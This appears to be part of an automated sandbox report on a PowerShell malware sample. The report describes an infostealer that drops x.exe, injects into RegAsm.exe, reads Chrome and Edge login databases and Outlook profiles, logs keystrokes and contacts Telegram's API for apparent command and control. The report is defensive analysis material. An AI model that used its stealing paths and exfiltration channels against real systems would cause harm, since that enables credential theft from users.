            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql"4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP*Y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`L(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpJT
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdtF
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\B\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,eJ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\!R
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8:r
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qaC
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPKD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$ty
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(=[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX}l
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD56
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q np
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`*n
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,g?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8_*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLCu
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDw-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh;N
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q Mf
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q43x
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPM9
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx|]
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX;X
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdte
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\e<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt33
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh]'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtSQ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q| s
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0N+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx[S
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q ,\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\Desktop\foreign.ps1 VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Remote Access Functionality

            Source: Yara match | File source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTR
            MITRE ATT&CK Matrix (a leading number is the count of signatures mapped to that technique; cells without a number are the unobserved remainder of the matrix)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 312 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | 21 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1615013 | Sample: foreign.ps1 | Startdate: 14/02/2025 | Architecture: WINDOWS | Score: 100

            Start
              DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP))
              DNS/IP: api.telegram.org (Uses the Telegram API (likely for C&C communication))
              DNS/IP: 2 other IPs or domains
              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
              Started: powershell.exe (16); notepad.exe (5)

            powershell.exe
              Dropped: C:\Users\user\AppData\Local\Temp\x.exe, PE32
              Signatures: Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
              Started: x.exe (3); conhost.exe

            x.exe
              Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 2 other signatures
              Started: RegAsm.exe (15, 2); RegAsm.exe

            RegAsm.exe (first instance)
              DNS/IP: checkip.dyndns.com 132.226.8.169, port 80 (local port 49726), UTMEMUS, United States
              DNS/IP: api.telegram.org 149.154.167.220, port 443 (local port 49770), TELEGRAMRU, United Kingdom
              DNS/IP: reallyfreegeoip.org 104.21.80.1, port 443 (local port 49732), CLOUDFLARENETUS, United States
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

            RegAsm.exe (second instance)
              Signatures: Contains functionality to register a low level keyboard hook
